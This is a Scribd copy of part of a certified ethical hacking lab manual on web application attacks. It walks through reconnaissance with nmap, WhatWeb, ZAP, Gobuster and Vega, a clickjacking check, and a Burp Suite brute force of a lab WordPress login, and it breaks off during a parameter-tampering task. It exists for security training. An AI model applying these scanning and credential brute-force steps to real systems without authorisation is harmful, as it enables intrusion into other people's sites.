KEMBAR78
Module 14 Hacking Web Applications | PDF | World Wide Web | Internet & Web
0% found this document useful (0 votes)
77 views263 pages

Module 14 Hacking Web Applications

The document outlines the process and objectives of web application hacking, emphasizing the importance of ethical hacking in securing web applications against various attacks. It details the tasks involved in web application reconnaissance, including footprinting, vulnerability scanning, and exploiting vulnerabilities like SQL injection and XSS. The document also introduces tools such as OWASP ZAP and WhatWeb for conducting security assessments and highlights the significance of understanding web application architecture for identifying potential vulnerabilities.

Uploaded by

akashaj1425
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
77 views263 pages

Module 14 Hacking Web Applications

The document outlines the process and objectives of web application hacking, emphasizing the importance of ethical hacking in securing web applications against various attacks. It details the tasks involved in web application reconnaissance, including footprinting, vulnerability scanning, and exploiting vulnerabilities like SQL injection and XSS. The document also introduces tools such as OWASP ZAP and WhatWeb for conducting security assessments and highlights the significance of understanding web application architecture for identifying potential vulnerabilities.

Uploaded by

akashaj1425
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 263

Scenario

A web application is a software application running on a web browser that allows a web
user to submit data to and retrieve it from a database over the Internet or within an
intranet. Web applications have helped to make web pages dynamic as they allow users
to communicate with servers using server-side scripts. They allow users to perform
specific tasks such as searching, sending emails, connecting with friends, online
shopping, and tracking and tracing.

Entities develop various web applications to offer their services to users via the Internet.
Whenever users need access to such services, they can request them by submitting the
uniform resource identifier (URI) or uniform resource locator (URL) of the web
application in a browser. Common web applications include webmail, online retail sales,
online auctions, wikis, and many others. With the wide adoption of web applications as a
cost-effective channel for communication and information exchange, they have also
become a major attack vector for gaining access to organizations’ information systems.
Web applications are an integral component of online business. Everyone connected via
the Internet uses an endless variety of web applications for different purposes, including
online shopping, email, chats, and social networking. Increasingly, web applications are
becoming vulnerable to more sophisticated threats and attack vectors.

Web application hacking is the exploitation of applications via HTTP by manipulating the
application logics via an application’s graphical web interface, tampering with the
uniform resource identifier (URI) or HTTP elements not contained in the URI. Methods for
hacking web applications, including SQL injection attacks, cross-site scripting (XSS),
cross-site request forgeries (CSRF), and insecure communications.

The last module involved acting as an attacker and assessing the security of a web
server platform. Now, it is time to move to the next, and most important, stage of a
security assessment. An expert ethical hacker or penetration tester (hereafter, pen
tester) must test web applications for various attacks such as brute-force, XSS,
parameter tampering, and CSRF, and then secure the web applications from such
attacks.

The labs in this module provide hands-on experience with various web application
attacks to help audit web application security in the target organization.

Objective
The objective of the lab is to perform web application hacking and other tasks that
include, but are not limited to:

 Footprinting a web application using various information-gathering tools


 Performing web spidering, detect load balancers, and identify web server
directories
 Performing web application vulnerability scanning
 Performing brute-force and cross-site request forgery (CSRF) attack
 Exploiting parameter tampering and cross-site scripting (XSS) vulnerabilities
 Exploiting WordPress plugin vulnerabilities
 Exploiting remote command execution vulnerability
 Exploiting file upload vulnerability
 Gaining backdoor access via a web shell
 Detecting web application vulnerabilities using various web application security
tools

Overview of Web Applications


Web applications provide an interface between end-users and web servers through a
set of web pages generated at the server end or that contain script code to be executed
dynamically in a client’s Web browser.

Web applications run on web browsers and use a group of server-side scripts (such as
ASP and PHP) and client-side scripts (such as HTML and JavaScript) to execute the
application. The working of a web application depends on its architecture, which
includes the hardware and software that performs tasks such as reading the request,
searching, gathering, and displaying the required data.

Lab Tasks
Ethical hackers or pen testers use numerous tools and techniques to perform web
application attacks on the target web application. Recommended labs that will assist
you in learning various web application attack techniques include:

1. Footprint the web infrastructure


o Perform web application reconnaissance
o Perform web application reconnaissance using WhatWeb
o Perform web spidering using OWASP ZAP
o Detect load balancers using various tools
o Identify web server directories
o Perform web application vulnerability scanning using Vega
o Identify clickjacking vulnerability using iframe
2. Perform web application attacks
o Perform a brute-force attack using Burp Suite
o Perform parameter tampering using Burp Suite
o Exploit parameter tampering and XSS vulnerabilities in web applications
o Perform cross-site request forgery (CSRF) attack
o Enumerate and hack a web application using WPScan and Metasploit
o Exploit a remote command execution vulnerability to compromise a target
web server
o Exploit a file upload vulnerability at different security levels
o Gain backdoor access via a web shell using Weevely
Lab 1: Footprint the Web Infrastructure

Lab Scenario

The first step in web application hacking for an ethical hacker or pen tester is to gather
the maximum available information about the target organization website by
performing web application footprinting using various techniques and tools. In this step,
you will use techniques such as web spidering and vulnerability scanning to gather
complete information about the target web application.

Web infrastructure footprinting helps you to identify vulnerable web applications,


understand how they connect with peers and the technologies they use, and find
vulnerabilities in specific parts of the web app architecture. These vulnerabilities can
further help you to exploit and gain unauthorized access to web applications.

The labs in this exercise demonstrate how easily hackers can gather information about
your web application and describe the vulnerabilities that exist in web applications.

Lab Objectives

 Perform web application reconnaissance


 Perform web application reconnaissance using WhatWeb
 Perform web spidering using OWASP ZAP
 Detect load balancers using various tools
 Identify web server directories
 Perform web application vulnerability scanning using Vega
 Identify clickjacking vulnerability using iframe

Overview of Footprinting the Web Infrastructure

Footprinting the web infrastructure allows attackers to engage in the following tasks:

 Server Discovery: Attackers attempt to discover the physical servers that host
a web application using techniques such as Whois Lookup, DNS Interrogation,
and Port Scanning
 Service Discovery: Attackers discover services running on web servers to
determine whether they can use some of them as attack paths for hacking a web
app
 Server Identification: Attackers use banner-grabbing to obtain server banners;
this helps to identify the make and version of the web server software
 Hidden Content Discovery: Footprinting also allows attackers to extract
content and functionality that is not directly linked to or reachable from the main
visible content

Task 1: Perform Web Application Reconnaissance


In web application reconnaissance, you must perform various tasks such as server
discovery, service discovery, server identification or banner grabbing, and hidden
content discovery. A professional ethical hacker or pen tester must gather as much
information as possible about the target website by performing web application
footprinting using various techniques and tools.

In this task, we will perform web application reconnaissance to gather information about
server IP address, DNS names, location and type of server, open ports and services,
make, model, version of the web server software, and server-side technology.

In this task, the target website (www.moviescope.com) is hosted by the victim


machine, Windows Server 2019. Here, the host machine is the Parrot
Security machine.
1. Click Parrot Security to switch to the Parrot Security machine.

2. In the login page, the attacker username will be selected by default.


Enter password as toor in the Password field and press Enter to log in to
the machine.
3. Perform a Whois lookup to gather information about the IP address of the
web server and the complete information about the domain such as its
registration details, name servers, IP address, and location.

4. Use tools such


as Netcraft (https://www.netcraft.com), SmartWhois (https://www.tamos.c
om), WHOIS Lookup (http://whois.domaintools.com), and Batch IP
Converter (http://www.sabsoft.com) to perform the Whois lookup.

5. Perform DNS Interrogation to gather information about the DNS servers,


DNS records, and types of servers used by the target organization. DNS zone
data include DNS domain names, computer names, IP addresses, domain
mail servers, service records, etc.

6. Use tools such as


Professional Toolset (https://tools.dnsstuff.com), DNSRecon (https://
github.com), and DNS Records (https://network-tools.com), Domain
Dossier (https://centralops.net) to perform DNS interrogation.
7. Now, we will perform port scanning to gather information about the open
ports and services running on the machine hosting the target website.

8. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

9. A Parrot Terminal window appears. In the terminal window, type sudo


su and press Enter to run the programs as a root user.

If a Question pop-up window appears, asking for you to update the


machine, click No to close the window.
10. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


11. Now, type cd and press Enter to jump to the root directory.
12. In the Parrot Terminal window, type nmap -T4 -A -v [Target Web
Application] (here, the target web application is www.moviescope.com)
and press Enter to perform a port and service discovery scan.

In this command, -T4: specifies setting time template (0-5), -A: specifies
aggressive scan, and -v: enables the verbose output (include all hosts and
ports in the output).
13. The result appears, displaying the open ports and services running on the
machine hosting the target website.
14. Scroll down to see the complete results. You can observe that the target
machine name, NetBIOS name, DNS name, MAC address, OS, and other
information is displayed, as shown in the screenshot.
15. Now, perform banner grabbing to identify the make, model, and version
of the target web server software.

16. In the terminal window, type telnet www.moviescope.com 80 and


press Enter to establish a telnet connection with the target machine.

Port 80 is the port number assigned to the commonly used Internet


communication protocol, Hypertext Transfer Protocol (HTTP).
17. The Trying 10.10.10.19… message appears; type GET / HTTP/1.0 and
press Enter two times.
18. The result appears, displaying information related to the server name and
its version, technology used.

19. Here, the server is identified as Microsoft-IIS/10.0 and the technology


used is ASP.NET.

In real-time, an attacker can specify either the IP address of a target


machine or the URL of a website. In both cases, the attacker obtains the
banner information of the respective target. In other words, if the attacker
entered an IP address, they receive the banner information of the target
machine; if they enter the URL of a website, they receive the banner
information of the respective web server that hosts the website.
20. This concludes the demonstration of how to perform web application
reconnaissance (Whois lookup, DNS interrogation, port and services
discovery, banner grabbing, and firewall detection).

21. Close all open windows and document all the acquired information.

Task 2: Perform Web Application Reconnaissance using


WhatWeb
WhatWeb identifies websites and recognizes web technologies, including content
management systems (CMS), blogging platforms, statistics and analytics packages,
JavaScript libraries, web servers, and embedded devices. It also identifies version
numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

Here, we will perform web application reconnaissance using the WhatWeb tool.
In this task, the target website (www.moviescope.com) is hosted by the victim
machine, Windows Server 2019. Keep this machine running until the end of the task.
Here, the host machine is the Parrot Security machine.
1. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo


su and press Enter to run the programs as a root user.

3. In the [sudo] password for attacker field, type toor as a password


and press Enter.

The password that you type will not be visible.


4. Now, type cd and press Enter to jump to the root directory.
5. In the Terminal window, type whatweb and press Enter. It displays a
list of the commands available with WhatWeb.
6. Now, type whatweb [Target Web Application] (here, the target web
application is www.moviescope.com) and press Enter to perform website
footprinting on the target website.

7. The result appears, displaying the MovieScope website infrastructure,


as shown in the screenshot.
8. In the terminal, type whatweb -v [Target Web Application] (here, the
target web application is www.moviescope.com) and press Enter to run a
verbosity scan on the target website.

9. The result appears, displaying a detailed report on the target website


such as its IP address, plugin information, and HTTP header information, as
shown in the screenshot.
10. Now, type whatweb --log-verbose=MovieScope_Report
www.moviescope.com and press Enter to export the results returned by
WhatWeb as a text file.

This will generate a report with the name MovieScope_Report and save
this file in the root folder.
11. Type, pluma MovieScope_Report and press Enter to open the file.
12. The MovieScope_Report text file appears, as shown in the screenshot.

In real-time, attackers use this information to determine the website


infrastructure and find underlying vulnerabilities, and later exploit them to
launch further attacks.
13. This concludes the demonstration of how to perform website
reconnaissance on a target website using the WhatWeb tool.

14. Close all open windows and document all the acquired information.

Task 3: Perform Web Spidering using OWASP ZAP


OWASP Zed Attack Proxy (ZAP) is an integrated penetration testing tool for finding
vulnerabilities in web applications. It offers automated scanners as well as a set of tools
that allow you to find security vulnerabilities manually. ZAP provides functionality for a
range of skill levels—from developers to testers new to security testing, to security
testing specialists.

Here, we will perform web spidering on the target website using OWASP ZAP.

In this task, the target website (www.moviescope.com) is hosted by the victim


machine, Windows Server 2019. Keep this machine running until the end of the task.
Here, the host machine is the Parrot Security machine.
1. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo


su and press Enter to run the programs as a root user.

3. In the [sudo] password for attacker field, type toor as a password


and press Enter.

The password that you type will not be visible.


4. Now, type cd and press Enter to jump to the root directory.
5. In the Terminal window, type zaproxy and press Enter to launch
OWASP ZAP.
6. The OWASP ZAP initializing window appears; wait for it to complete.

7. After completing initialization, a prompt that reads Do you want to


persist the ZAP Session? appears; select the No, I do not want to
persist this session at this moment in time radio button and click Start.

If a Manage Add-ons window appears, click the Close button.


8. The OWASP ZAP main window appears. Under the Quick Start tab,
click the Automated Scan option under Welcome to OWASP ZAP.
9. The Automated Scan wizard appears; enter the target website under
the URL to attack field (here, www.moviescope.com). Leave the other
settings to default and click the Attack button.
10. OWASP ZAP starts scanning the target website. You can observe various
URLs under the Spider tab.
11. After performing web spidering, OWASP ZAP performs active scanning.
Navigate to the Active Scan tab to observe the various scanned links.
12. After completing the active scan, the results appear under
the Alerts tab, displaying the various vulnerabilities and issues associated
with the target website, as shown in the screenshot.

In this task, the objective being web spidering, we will focus on the
information obtained while performing web spidering.
13. Now, click on the Spider tab from the lower section of the window to
view the web spidering information. By default, the URLs tab appears under
the Spider tab.

14. The URLs tab contains various links for hidden content and functionality
associated with the target website (www.moviescope.com).
15. Now, navigate to the Messages tab under the Spider tab to view more
detailed information regarding the URLs obtained while performing the web
spidering, as shown in the screenshot.

In real-time, attackers perform web spidering or crawling to discover hidden


content and functionality, which is not reachable from the main visible
content, to exploit user privileges within the application. It also allows
attackers to recover backup copies of live files, configuration and log files
containing sensitive data, backup archives containing snapshots of files
within the web root, and new functionality that is not linked to the main
application.
16. This concludes the demonstration of how to perform web spidering on a
target website using OWASP ZAP.

17. Close all open windows and document all the acquired information.

Task 4: Detect Load Balancers using Various Tools


Organizations use load balancers to distribute web server load over multiple servers
and increase the productivity and reliability of web applications. Generally, there are
two types of load balancers, namely, DNS load balancers (Layer 4 load balancers) and
http load balancers (layer 7 load balancers). You can use various tools such as dig and
load balancing detector (lbd) to detect the load balancers of the target organization
along with their real IP addresses.

Here, we will detect load balancers using dig command and lbd tool.

In this task, we will detect the load balancers on the website www.yahoo.com, as the
websites hosted by our lab environment do not use load balancers.
1. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo


su and press Enter to run the programs as a root user.

3. In the [sudo] password for attacker field, type toor as a password


and press Enter.

The password that you type will not be visible.


4. Now, type cd and press Enter to jump to the root directory.
5. A Parrot Terminal window appears; type dig yahoo.com and
press Enter.
6. The result appears, displaying the available load balancers of the target
website, as the screenshot demonstrates. Here, a single host resolves to
multiple IP addresses, which possibly indicates that the host is using a load
balancer.

dig command provides detailed results and is used to identify whether the
target domain is resolving to multiple IP addresses.
7. Now, type lbd yahoo.com and press Enter.

8. The result appears, displaying the available DNS load balancers used by
the target website, as shown in the screenshot.

lbd (load balancing detector) detects if a given domain uses DNS and http
load balancing via the Server: and Date: headers and the differences
between server answers. It analyzes the data received from application
responses to detect load balancers.
9. This concludes the demonstration of how to detect load balancers using
dig command and lbd tool.

10. Close all open windows and document all the acquired information.

Task 5: Identify Web Server Directories


Web servers host the web applications, so misconfigurations while hosting these web
applications may lead to the exposure of critical files and directories over the Internet. A
professional ethical hacker or pen tester must identify the target web application’s files
and directories exposed on the Internet using various automated tools such as Nmap
and Gobuster. This information further helps to gather sensitive information stored in
the files and folders.

Here, we will use Nmap and Gobuster tool to identify web server directories on the
target website.
In this task, the target website (www.moviescope.com) is hosted by the victim
machine, Windows Server 2019. Keep this machine running until the end of the task.
Here, the host machine is the Parrot Security machine.
1. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo


su and press Enter to run the programs as a root user.

3. In the [sudo] password for attacker field, type toor as a password


and press Enter.

The password that you type will not be visible.


4. Now, type cd and press Enter to jump to the root directory.
5. A Parrot Terminal window appears; type nmap -sV --script=http-
enum [target domain or IP address] (here, the target website
is www.moviescope.com) and press Enter.

6. The result appears, displaying open ports and services, along with their
version.

7. Scroll-down in the result and observe the identified web server directories
under the http-enum section, as shown in the screenshot.

In real-time, attackers use various techniques to detect the vulnerabilities in


the target web applications hosted by the web servers either to gain
administrator-level access to the server or to retrieve sensitive information
stored on the server. Attackers use the Nmap NSE script http-enum to
enumerate the applications, directories, and files of the web servers that are
exposed on the Internet. Through this method, attackers identify critical
security vulnerabilities on the target web application.
8. Now, we shall copy the wordlist file (common.txt) from a shared network
drive. We will use this file in the Gobuster tool.

9. Minimize the Terminal window.

10. Click Places from the top-section of the Desktop and


click Desktop from the drop-down options.
11. Navigate to CEHv11 Module 14 Hacking Web Applications folder and
copy common.txt file.

Press Ctrl+C to copy the folder.


12. Paste the copied file (common.txt) on the Desktop. Close the window.

Press Ctrl+V to paste the folder.


13. Now, switch back to the terminal window, type gobuster dir -u
[Target Website] -w /home/attacker/Desktop/common.txt, and
press Enter.

dir: uses directory or file brute-forcing mode, -u: specifies the target URL
(here, www.moviescope.com), and -w: is the wordlist file used for
directory brute-forcing (here, common.txt).
14. The result appears, displaying the identified web server directories, as
shown in the screenshot.

In real-time, attackers use Gobuster to scan the target website for web
server directories and perform fast-paced enumeration of the hidden files
and directories of the target web application. Gobuster is a command-
oriented tool used to brute-force URIs in websites, DNS subdomains, and
names of the virtual hosts on the target server.
15. This concludes the demonstration of how to identify web server
directories using Nmap and Gobuster.

16. Close all open windows and document all the acquired information.

Task 6: Perform Web Application Vulnerability Scanning using


Vega
Vega is a web application scanner used to test the security of web applications. It helps
you to find and validate SQL Injection, XSS, inadvertently disclosed sensitive
information, and other vulnerabilities.

Here, we will discover vulnerabilities in the target web application using Vega.

In this task, the target website (http://10.10.10.16:8080/dvwa) is hosted by the


victim machine Windows Server 2016; keep this machine running until the end of the
task. Here, the host machine is the Windows 10 machine.
1. Click Windows Server 2016 to switch to the Windows Server
2016 machine Click Ctrl+Alt+Delete to activate the machine, by
default, CEH\Administrator account is selected, click Pa$$w0rd to enter
the password and press Enter.

2. Now, in the right corner of Desktop, click the Show hidden icons icon,
observe that the WampServer icon appears.

3. Wait for this icon to turn green, which indicates that the WampServer is
successfully running.
4. Click Windows 10 to switch to the Windows 10 machine,
click Ctrl+Alt+Delete to activate the machine.
Alternatively, you can also click Ctrl+Alt+Delete button under Windows
10 machine thumbnail in the Resources pane or
Click Ctrl+Alt+Delete button under Commands (thunder icon) menu.
5. By default, Admin user profile is selected, click Pa$$w0rd to paste the
password in the Password field and press Enter to login.

Alternatively, you can also click Pa$$w0rd under Windows 10 machine


thumbnail in the Resources pane or Click Type Text | Type
Password button under Commands (thunder icon) menu.
Networks screen appears, click Yes to allow your PC to be discoverable by
other PCs and devices on the network.
6. In the Desktop, double-click Vega shortcut to launch the tool.
7. The Subgraph Vega main window appears, as shown in the screenshot.

8. Click Scan from the menu bar and select Start New Scan from the
available options.
9. The Select a Scan Target window appears on the screen. Ensure that
the Enter a base URI for scan radio button is selected under the Scan
Target section.

10. In the Enter a base URI for scan field, enter the target URL
as http://10.10.10.16:8080/dvwa and click Next.

10.10.10.16 is the IP address of Windows Server 2016, where


the DVWA site is hosted on port 8080.
11. The Select Modules wizard appears; double-click on both of the
checkboxes (Injection Modules and Response Processing Modules) to
select all options.

12. By checking these options, all modules under these options will be
selected. Click Next.
13. In the Authentication Options wizard, leave the settings to default and
click Next.

14. In Parameters wizard, leave the settings to default and click Finish to
initiate the scan.
15. The Follow Redirect? pop-up appears; click Yes to continue.
16. The Vega application starts scanning the target website for
vulnerabilities. Observe the Scanner Progress bar and wait for it to finish.

In the left-hand pane, under the Scan Alerts section, you can see the scan
status as Auditing. As soon as Vega completes, the scan status changes
to Completed.

17. After the scanner finishes performing its vulnerability assessment on the
target website, it lists the discovered vulnerabilities under Scan Alert
Summary.
18. In the left-pane under Scan Alerts, expand the nodes to view the
complete vulnerability scan result. Now, choose any one of the discovered
vulnerabilities to display it on the respective page, as in the dashboard
section shown in the screenshot.

19. Choose any one vulnerability under the Scan Alerts section in the left-
hand pane. Here, we are selecting the Cleartext Password over
HTTP vulnerability; detailed information regarding the selected vulnerability
will be displayed in the right section of the window, as shown in the
screenshot.
20. Similarly, you can select any vulnerability from the list of discovered
vulnerabilities to view its detailed information and then apply appropriate
fixes for all the vulnerable codes in your web application.

21. This concludes the demonstration of how to discover vulnerabilities in a


target website scanning using Vega.

22. You can also use other web application vulnerability scanning tools such
as WPScan Vulnerability
Database (https://wpscan.com), Arachni (https://www.arachni-
scanner.com), appspider (https://www.rapid7.com),
or Uniscan (https://sourceforge.net) to discover vulnerabilities in the target
website.

23. Close all open windows and document all the acquired information.

Task 7: Identify Clickjacking Vulnerability using iframe


Clickjacking, also known as a “UI redress attack,” occurs when an attacker uses multiple
transparent or opaque layers to trick a user into clicking on a button or link on another
page when they intend to click on the top-level page. Thus, the attacker is “hijacking”
clicks meant for the top-level page and routing them to another page, most likely
owned by another application, domain, or both.

Here, we will identify clickjacking vulnerability using iframe.

In this task, we will identify clickjacking vulnerability in the target website


(www.moviescope.com) hosted by the Windows Server 2019 machine, and we will
use the Windows 10 machine as the host machine.
1. In Windows 10 machine, navigate to D:\CEH-Tools\CEHv11 Module
14 Hacking Web Applications and double-click the iframe.html file; the
file opens in the default web browser (here, Google Chrome).

2. The target website appears in the created iframe, indicating that the
target website is vulnerable to clickjacking, as shown in the screenshot.

If you can see the text “Website is vulnerable to clickjacking!” at the


top of the page, and your target web page is also successfully loaded into
the frame, then your site is vulnerable and has no type of protection against
Clickjacking attacks.
3. This concludes the demonstration of how to identify clickjacking
vulnerability on a target website.

4. Close all open windows and document all the acquired information.

Lab 2: Perform Web Application Attacks

Lab Scenario

For an ethical hacker or pen tester, the next step after gathering required information
about the target web application is to attack the web application. They must have the
required knowledge to perform web application attacks to test the target network’s web
application security infrastructure.

Attackers perform web application attacks with certain goals in mind. These goals may
be either technical or non-technical. For example, attackers may breach the security of
the web application and steal sensitive information for financial gain or for curiosity’s
sake. To hack the web app, first, the attacker analyzes it to determine its vulnerable
areas. Next, they attempt to reduce the “attack surface.” Even if the target web
application only has a single vulnerability, attackers will try to compromise its security
by launching an appropriate attack. They try various application-level attacks such as
injection, XSS, broken authentication, broken access control, security misconfiguration,
and insecure deserialization to compromise the security of web applications to commit
fraud or steal sensitive information.
An ethical hacker or pen tester must test their company’s web application against
various attacks and other vulnerabilities. They must find various ways to extend the
security test and analyze web applications, for which they employ multiple testing
techniques. This will help in predicting the effectiveness of additional security measures
in strengthening and protecting web applications in the organization.

The tasks in this lab will assist in performing attacks on web applications using various
techniques and tools.

Lab Objectives

 Perform a brute-force attack using Burp Suite


 Perform parameter tampering using Burp Suite
 Exploit parameter tampering and XSS vulnerabilities in web applications
 Perform cross-site request forgery (CSRF) attack
 Enumerate and hack a web application using WPScan and Metasploit
 Exploit a remote command execution vulnerability to compromise a target web
server
 Exploit a file upload vulnerability at different security levels
 Gain backdoor access via a web shell using Weevely

Overview of Web Application Attacks

One maintains and accesses web applications through various levels that include
custom web applications, third-party components, databases, web servers, OSes,
networks, and security. All the mechanisms or services employed at each layer help the
user in one way or another to access the web application securely. When talking about
web applications, the organization considers security to be a critical component,
because web applications are major sources of attacks. Attackers make use of
vulnerabilities to exploit and gain unrestricted access to the application or the entire
network. Attackers try various application-level attacks to compromise the security of
web applications to commit fraud or steal sensitive information.

Task 1: Perform a Brute-force Attack using Burp Suite


Burp Suite is an integrated platform for performing security testing of web applications.
It has various tools that work together to support the entire testing process from the
initial mapping and analysis of an application’s attack surface to finding and exploiting
security vulnerabilities. Burp Suite contains key components such as an intercepting
proxy, application-aware spider, advanced web application scanner, intruder tool,
repeater tool, and sequencer tool.

Here, we will perform a brute-force attack on the target website using Burp Suite.

In this task, the target WordPress website (http://10.10.10.16:8080/CEH) is hosted by


the victim machine, Windows Server 2016. Keep this machine running until the end
of the task. Here, the host machine is the Parrot Security machine.
1. Click Parrot Security to switch to the Parrot Security machine.
2. Click the Firefox icon from the top section of Desktop to launch
the Mozilla Firefox browser.

3. The Mozilla Firefox window appears;


type http://10.10.10.16:8080/CEH/wp-login.php? Into the address bar
and press Enter.

Here, we will perform a brute-force attack on the designated WordPress


website hosted by the Windows Server 2016 machine.

4. Now, we shall set up a Burp Suite proxy by first configuring the proxy
settings of the browser.

5. In the Mozilla Firefox browser, click the Open menu icon in the right
corner of the menu bar and select Preferences from the list.
6. The General settings tab appears. In the Find in Preferences search
bar, type proxy, and press Enter.

7. The Search Results appear. Click the Settings button under


the Network Settings option.
8. The Connection Settings window appears; select the Manual proxy
configuration radio button and specify the HTTP Proxy as 127.0.0.1 and
the Port as 8080. Tick the Use this proxy server for all
protocols checkbox and click OK. Close the Preferences tab and minimize
the browser window.
9. Now, minimize the browser window, click the Applications menu form
the top left corner of Desktop, and navigate to Pentesting --> Web
Application Analysis --> Web Application Proxies --> burpsuite to
launch the Burp Suite application.
10. A security pop-up appears, enter the password as toor in
the Password field and click OK.
11. In the next Burp Suite Community Edition notification, click OK.
12. In the Terms and Conditions wizard, click the I Accept button.

If Delete old temporary files? pop-up appears, click Delete.


13. The Burp Suite main window appears; ensure that the Temporary
project radio button is selected and click the Next button, as shown in the
screenshot.

If an update window appears, click Close.


14. In the next window, select the Use Burp defaults radio-button and click
the Start Burp button.
15. The Burp Suite main window appears; click the Proxy tab from the
available options in the top section of the window.
16. In the Proxy settings, by default, the Intercept tab opens-up. Observe
that by default, the interception is active as the button says Intercept is on.
Leave it running.

Turn the interception on if it is off.


17. Switch back to the browser window. On the login page of the target
WordPress website, type random credentials, here admin and password.
Click the Log In button.

You can enter the credentials of your choice here.


18. Switch back to the Burp Suite window; observe that the HTTP request
was intercepted by the application.

19. Now, right-click anywhere on the HTTP request window, and from the
context menu, click Send to Intruder.

Observe that Burp Suite intercepted the entered login credentials.


If you do not get the request as shown in the screenshot, then press
the Forward button.
20. Now, click on the Intruder tab from the toolbar and observe that under
the Intruder tab, the Target tab appears by default.

21. Observe the target host and port values in the Host and Port fields.
22. Click on the Positions tab under the Intruder tab and observe that Burp
Suite sets the target positions by default, as shown in the HTTP request. Click
the Clear § button from the right-pane to clear the default payload values.
23. Once you clear the default payload values, select Cluster bomb from
the Attack type drop-down list.

Cluster bomb uses multiple payload sets. There is a different payload set for
each defined position (up to a maximum of 20). The attack iterates through
each payload set in turn so that all permutations of payload combinations
are tested. For example, if there are two payload positions, the attack will
place the first payload from payload set 2 into position 2 and iterate through
all payloads in payload set 1 in position 1; it will then place the second
payload from payload set 2 into position 2 and iterate through all the
payloads in payload set 1 in position 1.
24. Now, we will set the username and password as the payload values. To
do so, select the username value entered in Step 17 and click Add § from
the left-pane.

25. Similarly, select the password value entered in Step 17 and click Add
§ from the left-pane.

Here, the username and password are admin and password.


26. Once the username and password payloads are added. The
symbol ‘§’ will be added at the start and end of the selected payload values.
Here, as the screenshot shows, the values are admin and password.
27. Navigate to the Payloads tab under the Intruder tab and ensure that
under the Payload Sets section, the Payload set is selected as 1, and
the Payload type is selected as Simple list.

28. Under the Payload Options [Simple list] section, click


the Load… button.
29. A file selection window appears; navigate to the
location /home/attacker/Desktop/CEHv11 Module 14 Hacking Web
Applications/Wordlist, select the username.txt file, and click
the Open button.
30. Observe that the selected username.txt file content appears under
the Payload Options [Simple list] section, as shown in the screenshot.
31. Similarly, load a password file for the payload set 2. To do so, under the
Payload Sets section, select the Payload set as 2 from the drop-down
options and ensure that the Payload type is selected as Simple list.

32. Under the Payload Options [Simple list] section, click


the Load… button.
33. A file selection window appears; navigate to the
location /home/attacker/Desktop/CEHv11 Module 14 Hacking Web
Applications/Wordlist, select the password.txt file, and click
the Open button.
34. Observe that selected password.txt file content appears under
the Payload Options [Simple list] section, as shown in the screenshot.
35. Once the wordlist files are selected as payload values, click the Start
attack button to launch the attack.
36. A Burp Intruder notification appears. Click OK to proceed.
37. The Intruder attack 1 window appears as the brute-attack initializes. It
displays various username-password combinations along with the Length of
the response and the Status.

38. Wait for the progress bar at the bottom of the window to complete.
39. After the progress bar completes, scroll down and observe the different
values of Status and Length. Here, Status=302 and Length= 1105.

Different values of Status and Length indicate that the combination of the
respective credentials is successful.
The values might differ in your lab environment.
40. In the Raw tab under the Request tab, the HTTP request with a set of
the correct credentials is displayed. (here, username=admin and
password=qwerty@123), as shown in the screenshot. Note down these user
credentials.
41. Now, that you have obtained the correct user credentials, close
the Intruder attack 1 window.

If a Warning pop-up appears, click OK.


42. Navigate back to the Proxy tab and click the Intercept is on button to
turn off the interception. The Intercept is on button toggles to Intercept is
off, indicating that the interception is off.
43. Switch to the browser window and perform Steps 5-7. Remove the
browser proxy set up in Step 8, by selecting the No proxy radio-button in
the Connection Settings window and click OK. Close the tab.
44. Reload the target website http://10.10.10.16:8080/CEH/wp-
login.php?, enter the Username and Password obtained in Step 40 and
click Log In.

Here, the username and password are admin and qwerty@123.


If a pop-up appears, click Resend.
45. You are successfully logged in using the brute-forced credentials.
The Welcome to WordPress! Page appears, as shown in the screenshot.
46. This concludes the demonstration of how to perform a brute-force attack
using Burp Suite.

47. Close all open windows and document all the acquired information.

Task 2: Perform Parameter Tampering using Burp Suite


A web parameter tampering attack involves the manipulation of parameters exchanged
between the client and server to modify application data such as user credentials and
permissions, price, and quantity of products.

Here, we will use the Burp Suite tool to perform parameter tampering.

In this task, the target website (www.moviescope.com) is hosted by the victim


machine, Windows Server 2019. Here, the host machine is the Parrot
Security machine.
1. In Parrot Security machine click the Firefox icon from the top section
of Desktop to launch the Mozilla Firefox browser.
2. The Mozilla Firefox window appears;
type http://www.moviescope.com Into the address bar and press Enter.

3. Now, set up a Burp Suite proxy by first configuring the proxy settings of
the browser.

4. In the Mozilla Firefox browser, click the Open menu icon in the right
corner of the menu bar and select Preferences from the list.
5. The General settings tab appears. In the Find in Preferences search
bar, type proxy, and press Enter.

6. The Search Results appear. Click the Settings button under


the Network Settings option.
7. A Connection Settings window appears. Select the Manual proxy
configuration radio button and click OK. Close the Preferences tab.
8. Now, minimize the browser window, click the Applications menu form
the top left corner of Desktop, and navigate to Pentesting --> Web
Application Analysis --> Web Application Proxies --> burpsuite to
launch the Burp Suite application.
9. A security pop-up appears, enter the password as toor in
the Password field and click OK.
10. In the next Burp Suite Community Edition notification, click OK.
11. Burp Suite initializes. If a Burp Suite Community Edition notification
saying An update is available appears, click Close.

12. The Burp Suite main window appears; ensure that the Temporary
project radio button is selected and click the Next button, as shown in the
screenshot.

If an update window appears, click Close.


13. In the next window, select the Use Burp defaults radio-button and click
the Start Burp button.
14. The Burp Suite main window appears; click the Proxy tab from the
available options in the top section of the window.
15. In the Proxy settings, by default, the Intercept tab opens-up. Observe
that by default, the interception is active as the button says Intercept is on.
Leave it running.

Turn the interception on if it is off.


16. Switch back to the browser window, and on the login page of the target
website (www.moviescope.com), enter the credentials sam and test.
Click the Log In button.

Here, we are logging in as a registered user on the website.


